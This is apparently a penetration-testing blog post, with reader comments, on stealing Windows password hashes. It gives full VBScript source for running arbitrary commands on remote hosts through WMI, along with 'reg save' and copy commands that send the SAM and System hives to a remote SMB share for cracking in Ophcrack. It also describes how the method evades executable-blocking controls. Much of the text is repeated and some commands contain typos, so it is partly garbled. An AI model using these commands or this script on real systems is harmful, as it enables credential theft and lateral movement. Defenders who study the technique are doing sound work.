The commands are simple:
reg save HKLM\SAM <filename>
reg save HKML\System <filename>
reg save HKML\System <filename>
You can then import these files in Ophcrack (File->Load->'Read encrypted SAM' option), which should output some nice hashes for you to crack.
Now how to run remotely? PSExec is one option, but with WMI and VBScript, it is possible to run any remote command (and has been since Windows 2000). I prefer this method for a couple of reasons - it does not require any services or files to be copied across to the target host, and it still works in [some] situations where SRP or products such as Sanctuary are configured to block local executables from running.
The code is fairly straightforward, and mainly taken from various MSDN articles:
Option Explicit
Dim target, username, password, strCommand, objSWbemLocator, objSWbemServices, objProcess, intProcessID, errReturn
If WScript.Arguments.Count = 4 Then
target = WScript.Arguments.Item(0)
username = WScript.Arguments.Item(1)
password = WScript.Arguments.Item(2)
strCommand = WScript.Arguments.Item(3)
Else
Wscript.Echo "Usage: vbExec.vbs target username password command"
Wscript.Quit
End If
set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator")
set objSWbemServices = objSWbemLocator.ConnectServer(target, "root\cimv2", username, password)
objSWbemServices.Security_.ImpersonationLevel = 3
objSWbemServices.Security_.AuthenticationLevel = 6
set objProcess = objSWbemServices.Get("Win32_Process")
errReturn = objProcess.Create(strCommand, null, null, intProcessID)
If errReturn = 0 Then
Wscript.Echo "Process was started with ID: " & intProcessID
Else
Wscript.Echo "Process could not be started due to error: " & errReturn
End If
Dim target, username, password, strCommand, objSWbemLocator, objSWbemServices, objProcess, intProcessID, errReturn
If WScript.Arguments.Count = 4 Then
target = WScript.Arguments.Item(0)
username = WScript.Arguments.Item(1)
password = WScript.Arguments.Item(2)
strCommand = WScript.Arguments.Item(3)
Else
Wscript.Echo "Usage: vbExec.vbs target username password command"
Wscript.Quit
End If
set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator")
set objSWbemServices = objSWbemLocator.ConnectServer(target, "root\cimv2", username, password)
objSWbemServices.Security_.ImpersonationLevel = 3
objSWbemServices.Security_.AuthenticationLevel = 6
set objProcess = objSWbemServices.Get("Win32_Process")
errReturn = objProcess.Create(strCommand, null, null, intProcessID)
If errReturn = 0 Then
Wscript.Echo "Process was started with ID: " & intProcessID
Else
Wscript.Echo "Process could not be started due to error: " & errReturn
End If
Download from here.
So if you want to grab the SAM, or run any other command for that matter....you can do something like this...
vbsExec.vbs 192.168.0.1 user password "reg save HKLM\SAM \\192.168.0.2\writeable_share\SAM"
vbsExec.vbs 192.168.0.1 user password "reg save HKLM\System \\192.168.0.2\writeable_share\System"
vbsExec.vbs <target> <username> <password> <command>
NB: The above examples write the output from the reg save command straight to a remote SMB share - no need to touch the file system on the target at all!vbsExec.vbs 192.168.0.1 user password "reg save HKLM\System \\192.168.0.2\writeable_share\System"
vbsExec.vbs <target> <username> <password> <command>
Of course, it is worth copying the repair SAM/System files at the same time, which you can do with the following commands:
vbsExec.vbs 192.168.0.1 user password "copy c:\windows\repair\SAM \\192.168.0.2\writeable_share\SAM"
vbsExec.vbs 192.168.0.1 user password "copy c:\windows\repair\System \\192.168.0.2\writeable_share\System"
vbsExec.vbs 192.168.0.1 user password "copy c:\windows\repair\System \\192.168.0.2\writeable_share\System"
Enjoy :)
Can it be done with limited user rights??
ReplyDeleteAdmin only I'm afraid
DeleteNice one.
ReplyDelete